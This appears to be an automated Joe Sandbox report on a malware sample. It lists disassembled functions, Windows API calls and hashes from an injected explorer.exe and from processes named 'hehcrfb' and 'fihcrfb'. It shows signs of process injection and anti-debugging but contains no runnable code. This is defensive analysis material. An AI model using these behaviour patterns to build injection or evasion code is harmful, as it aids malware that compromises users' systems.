
NtUnmapViewOfSection.NTDLL ref: 00E0378C

Memory Dump Source

Source File: 00000011.00000002.3873276692.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e01000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction ID: 1667494eab80e3b374471fe928cb69fd41e09cdfa2eb5a3ea4a402e1e6f0a319
Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction Fuzzy Hash: 5711B6746019094BFB5CFBB8989D37633E5E718312F58506AA815C76E2DE398AC18700

Function 00E0B4A8 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00E0B5A7
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00E0B651
VirtualProtect.KERNELBASE ref: 00E0B66F

Memory Dump Source

Source File: 00000011.00000002.3873276692.0000000000E0A000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e0a000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction ID: 455f310c238ced8171cbb5c9c32dd078e9a1fb1256885cf2e1a28caac3b06082
Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction Fuzzy Hash: FC518A31754D1E4BCB24AB789CC02F4B3C2F755329B1816AAC49AE32C5E759C9C68381

Function 00E034C4 Relevance: 3.2, APIs: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E01BF8: OpenFileMappingA.KERNEL32 ref: 00E01C0F
Part of subcall function 00E01BF8: MapViewOfFile.KERNELBASE ref: 00E01C2E

SysFreeMap.PGOCR ref: 00E036F7
SleepEx.KERNELBASE ref: 00E03701

Memory Dump Source

Source File: 00000011.00000002.3873276692.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e01000_explorer.jbxd

Similarity

API ID: File$FreeMappingOpenSleepView
String ID:
API String ID: 4205437007-0
Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction ID: 02b186db45fcb89b5a128319fdd342c51e028a70ac1ea11a43d96ea4c848f749
Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction Fuzzy Hash: 9851F630218A088FDB09FF38D8996BA73E6EB95304F44565DE44BD72E1DF38EA458781

Function 00E01BF8 Relevance: 3.0, APIs: 2, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32 ref: 00E01C0F
MapViewOfFile.KERNELBASE ref: 00E01C2E

Memory Dump Source

Source File: 00000011.00000002.3873276692.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e01000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction ID: 0d32a82cc5a1697248c525d8ab4b1903168984787318f7122b1880b7721a8faa
Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction Fuzzy Hash: 61F0FE34314E494FAB49EF7C989C125B7E1EBA8206744857A985AC6165EF34C8858711

Analysis Process: hehcrfbPID: 4448, Parent PID: 660COMMON

Executed Functions

Function 00401681 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 303771f023d4e94bce52889dc268f844609580f8124493d745e7c6b152ca6148
Instruction ID: cb7014ea4a2fde73be17652fedec27c9feeca99d45f78c766f4f7c6d4be00a19
Opcode Fuzzy Hash: 303771f023d4e94bce52889dc268f844609580f8124493d745e7c6b152ca6148
Instruction Fuzzy Hash: AFD05E769503455FDB009F717C08BA63BDCA784795F048836B81DC6290E67AC5509A48

Non-executed Functions

Function 00418C80 Relevance: 77.3, APIs: 36, Strings: 8, Instructions: 310
librarymemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00418CE2
WriteConsoleOutputAttribute.KERNEL32(00000000,00000000,00000000,?,?), ref: 00418D2D
GetCommandLineW.KERNEL32 ref: 00418D78
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D9B
SetFocus.USER32(00000000), ref: 00418DA4
ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418DAF
FindAtomW.KERNEL32(00000000), ref: 00418DB6
SearchPathA.KERNEL32(wapopasihe,nemagutimebonefotekoneb,bopuwofebakuduwin,00000000,?,?), ref: 00418DDA
GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418DE2
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418DFA
_memset.LIBCMT ref: 00418E10
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418E21
CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418E2D
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418E43
GetEnvironmentStringsW.KERNEL32 ref: 00418E49
WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418E8E
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418E9D
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418EA6
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418EBB
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418ECC
SetCommMask.KERNEL32(00000000,00000000), ref: 00418EF5
GetLastError.KERNEL32 ref: 00418EF7
GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418F0B
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418F3A
GetComputerNameW.KERNEL32(?,?), ref: 00418F4E
GetConsoleAliasExesLengthW.KERNEL32 ref: 00418F54
GetBinaryTypeA.KERNEL32(bahujijudunogikawatihohelujof,?), ref: 00418F66
PurgeComm.KERNEL32(00000000,00000000), ref: 00418F6E
_calloc.LIBCMT ref: 00418F76
_calloc.LIBCMT ref: 00418F89
LoadLibraryA.KERNEL32(msimg32.dll), ref: 00418FE2
GlobalAlloc.KERNEL32(00000000,00000000), ref: 0041900D
GetStdHandle.KERNEL32(00000000), ref: 00419011
MoveFileW.KERNEL32(00000000,00000000), ref: 00419017
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 0041903E
GetFileAttributesA.KERNEL32(mufolomeragakowubicigero), ref: 00419077

Strings

bahujijudunogikawatihohelujof, xrefs: 00418F61
k`, xrefs: 0041901D
nemagutimebonefotekoneb, xrefs: 00418DD0
mufolomeragakowubicigero, xrefs: 00419072
msimg32.dll, xrefs: 00418FDD
wapopasihe, xrefs: 00418DD5
}$, xrefs: 00419045
bopuwofebakuduwin, xrefs: 00418DCB

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: Console$File$CommObject$CompareExchangeInformationInterlockedLengthNameOutputPathSearchWrite_calloc$AdjustmentAlarmAliasAliasesAllocAtomAttributeAttributesAuditBinaryCommandComputerConfigCopyCreateDefaultEnvironmentErrorExesFindFocusGlobalHandleLastLibraryLineLoadMaskModeModuleMovePipePrivilegePurgeReadSingleStringsSystemTimeTypeUserVolumeWait_memset
String ID: bahujijudunogikawatihohelujof$bopuwofebakuduwin$k`$msimg32.dll$mufolomeragakowubicigero$nemagutimebonefotekoneb$wapopasihe$}$
API String ID: 2037564194-3937991245
Opcode ID: 1067e03fbf93e69b4f39a2358ec748eff479c0dd2fe9ee59bcb20172be9e4c49
Instruction ID: cec1c0038aff85c57551383c5b233afae2bf81415c058cacd0026c3a6edaf131
Opcode Fuzzy Hash: 1067e03fbf93e69b4f39a2358ec748eff479c0dd2fe9ee59bcb20172be9e4c49
Instruction Fuzzy Hash: 02B1B671901224ABCB219F61DC44BDF7B79EF5D714F00806AF609A71A1DB381A85CFAE

Function 00401000 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 004015E1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004015F6
UnhandledExceptionFilter.KERNEL32(PA), ref: 00401601
GetCurrentProcess.KERNEL32(C0000409), ref: 0040161D
TerminateProcess.KERNEL32(00000000), ref: 00401624

Strings

PA, xrefs: 004015FC

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: PA
API String ID: 2579439406-4003426662
Opcode ID: 08e894e7397114792053717ef5d1d8be5021fb45822fe29cacdd0d0ec7153051
Instruction ID: a9805fc8b09d2057952d5a0785da509dc7222d8bc85e00f1d12cc36ee1d3e06d
Opcode Fuzzy Hash: 08e894e7397114792053717ef5d1d8be5021fb45822fe29cacdd0d0ec7153051
Instruction Fuzzy Hash: 3421CDBC902204DFE711EF2AED486C47BE4FB08314F04997AE908972A0E7749985CF1E

Function 004047EE Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000047AC), ref: 004047F3

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 082e7bc162a6d56d77b311cfc5dd17085e16372c2f7f22f823c548adfaf14cf6
Instruction ID: 3efac7d686926e2f480a98521f12a7af5aac45af82772df426a3cb1b688467d9
Opcode Fuzzy Hash: 082e7bc162a6d56d77b311cfc5dd17085e16372c2f7f22f823c548adfaf14cf6
Instruction Fuzzy Hash: 589002E42531049A87021BB05C1954529905ACD6227A144B1E105D60D8DB684168551E

Function 00418B20 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00418B34
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418B46
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
OpenJobObjectA.KERNEL32(00000000,00000000,sibepeyedupucis), ref: 00418B9E
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0

Strings

-, xrefs: 00418BBD
sibepeyedupucis, xrefs: 00418B95

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
String ID: -$sibepeyedupucis
API String ID: 2332831159-1718117500
Opcode ID: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
Instruction ID: 677527fee2e31da48b0f78a64988b8bc3df04c21d5f76ad85ec8a00fc73180d6
Opcode Fuzzy Hash: 5e2e18812709dbbfbd16d3132f3650d7e0538531bdec8af4ad055abf3aa7d160
Instruction Fuzzy Hash: 94116B71A49304BBE7209FA0EC46FEA3F74AB08B11F204129FB04691C1CAB82981875F

Function 00418B56 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00418B81
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00418B8F
OpenJobObjectA.KERNEL32(00000000,00000000,sibepeyedupucis), ref: 00418B9E
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BB0

Strings

-, xrefs: 00418BBD
sibepeyedupucis, xrefs: 00418B95

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
String ID: -$sibepeyedupucis
API String ID: 1414951042-1718117500
Opcode ID: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
Instruction ID: 0a3812f3688d595350d52c489f49ccd1e134694a55c2d67ff5c1230b235e6e50
Opcode Fuzzy Hash: 2299a56ff30a40d6bd7fe4c42dee0eb7b50c8d560fcc531e9162b1cde90d6cde
Instruction Fuzzy Hash: B4F0C871B85304ABD7208F94EC46BD97B60FB09725F214259F6046E1C1C7B52951DB8B

Function 00418BE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryDosDeviceA.KERNEL32(jutusenavocibiyaxunokubiyefet,?,00000000), ref: 00418C17
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418C32
HeapDestroy.KERNEL32(00000000), ref: 00418C51
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418C60

Strings

jutusenavocibiyaxunokubiyefet, xrefs: 00418C12

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID: jutusenavocibiyaxunokubiyefet
API String ID: 4159173863-2484441926
Opcode ID: 5ac95634ee3b73ff1daa8c9c947de5f20d0109c9affbe59bd8529e564f76d465
Instruction ID: 756bc8bfdf9d8d10eb6f9b921beda427f38e019a2e514af8c0d7042b50038681
Opcode Fuzzy Hash: 5ac95634ee3b73ff1daa8c9c947de5f20d0109c9affbe59bd8529e564f76d465
Instruction Fuzzy Hash: E901D8B4A012049BCB20AF64ED45BDA3778EB18745F40407BFB05A7290DE345984CFAA

Function 00403501 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 0040350D

Part of subcall function 004028F1: __getptd_noexit.LIBCMT ref: 004028F4
Part of subcall function 004028F1: __amsg_exit.LIBCMT ref: 00402901

__amsg_exit.LIBCMT ref: 0040352D
__lock.LIBCMT ref: 0040353D
InterlockedDecrement.KERNEL32(?), ref: 0040355A
InterlockedIncrement.KERNEL32(005B2B00), ref: 00403585

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 0fb39e8464d5a2b3aa83b1e2368a65283da0ec9139f026891d80e097134ada15
Instruction ID: b38363795809dd3546f55198ca21e0ce7f03dabd1553070faffb9ee770236157
Opcode Fuzzy Hash: 0fb39e8464d5a2b3aa83b1e2368a65283da0ec9139f026891d80e097134ada15
Instruction Fuzzy Hash: 7D018E72D01621BBCB11AF66A80979E7B64BF04725F40813BE814772E0C77C9A419BCD

Function 0040100F Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0040102D

Part of subcall function 0040182D: __mtinitlocknum.LIBCMT ref: 00401843
Part of subcall function 0040182D: __amsg_exit.LIBCMT ref: 0040184F
Part of subcall function 0040182D: EnterCriticalSection.KERNEL32(?,?,?,0040258D,00000004,0041B548,0000000C,004010B7,?,?,00000000), ref: 00401857

___sbh_find_block.LIBCMT ref: 00401038
___sbh_free_block.LIBCMT ref: 00401047
HeapFree.KERNEL32(00000000,?,0041B4C0,0000000C,004028E2,00000000,?,00402BD8,?,00000001,?,?,004017B7,00000018,0041B528,0000000C), ref: 00401077
GetLastError.KERNEL32(?,00402BD8,?,00000001,?,?,004017B7,00000018,0041B528,0000000C,00401848,?,?,?,0040258D,00000004), ref: 00401088

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 88e18c0cf56d15f127b898dc0920ea4c7a6c59c617d5a2bcd1795d90db3bafc7
Instruction ID: 82808b4b38e146a2ce22b6fc7430859710347c24705f98adbb9cb817f3ceedf7
Opcode Fuzzy Hash: 88e18c0cf56d15f127b898dc0920ea4c7a6c59c617d5a2bcd1795d90db3bafc7
Instruction Fuzzy Hash: 2B01DB729013459BDB307F729C0AB5E3B64AF00764F10853FF544761E1CB7C85808A5D

Function 00408484 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(KERNEL32,004040A0), ref: 00408489
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00408499

Strings

IsProcessorFeaturePresent, xrefs: 00408493
KERNEL32, xrefs: 00408484

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 4bbef799300f6a31148cb669580f07f4f269d62d16060a35c0fb901ff634b035
Instruction ID: dfe559acda7b54e879ae74bae017c07ad221b521cb95bab70d62cab3d7b49331
Opcode Fuzzy Hash: 4bbef799300f6a31148cb669580f07f4f269d62d16060a35c0fb901ff634b035
Instruction Fuzzy Hash: F8F03030A40A0ED2EF002BB1BD0E7AF7A74FB94706F9645A5D5D1B00D4DF7880B9829A

Function 00408370 Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__cftof_l.LIBCMT ref: 00408396

Part of subcall function 004081BB: __fltout2.LIBCMT ref: 004081E7

__cftog_l.LIBCMT ref: 004083BC
__cftoe_l.LIBCMT ref: 004083EE

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 90881730480e07db8bfbb96aa53543ddcb4327a5d8f2a223ca44fba9169e931e
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: FD11753200414EFBCF125E85DD41CEE3F22BF58754B58842AFE9865271DA3BC972AB85

Function 00403C6D Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00403C79

Part of subcall function 004028F1: __getptd_noexit.LIBCMT ref: 004028F4
Part of subcall function 004028F1: __amsg_exit.LIBCMT ref: 00402901

__getptd.LIBCMT ref: 00403C90
__amsg_exit.LIBCMT ref: 00403C9E
__lock.LIBCMT ref: 00403CAE

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 871ed6f757789ca6b79915de1d572e55a2714164683be5c656cbc2df2ece1b14
Instruction ID: 2bbd45e75700c65cc27abf153e1d036acd447da389ceb688e001def5a2c8595a
Opcode Fuzzy Hash: 871ed6f757789ca6b79915de1d572e55a2714164683be5c656cbc2df2ece1b14
Instruction Fuzzy Hash: 97F06233904B00CAE710BF7A850A78977A4BF00719F10813FE850F72D1CB7C9A019B5A

Function 00418940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00514D70), ref: 00418A1F
GetProcAddress.KERNEL32(00000000,0041F298), ref: 00418A5C

Strings

, xrefs: 00418985

Memory Dump Source

Source File: 00000021.00000002.3873758509.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.3873622358.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874031903.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874374504.000000000041D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000021.00000002.3874680482.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_400000_hehcrfb.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-3916222277
Opcode ID: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
Instruction ID: 50ffa957652d6c793d686c1d0a186ca9e6a8cd8bf043fc734a0081a481964278
Opcode Fuzzy Hash: 398baf0f62d3ebe154dec5401b54ff8969b7698fed3914d40e8ab17bf83b2898
Instruction Fuzzy Hash: B4312918518680CAEB01DB78FC057923B66AB75709F04E1B8D14C8B7B1D7BB051E9B6A

Analysis Process: fihcrfbPID: 6848, Parent PID: 660COMMON

Executed Functions

Function 00401681 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin
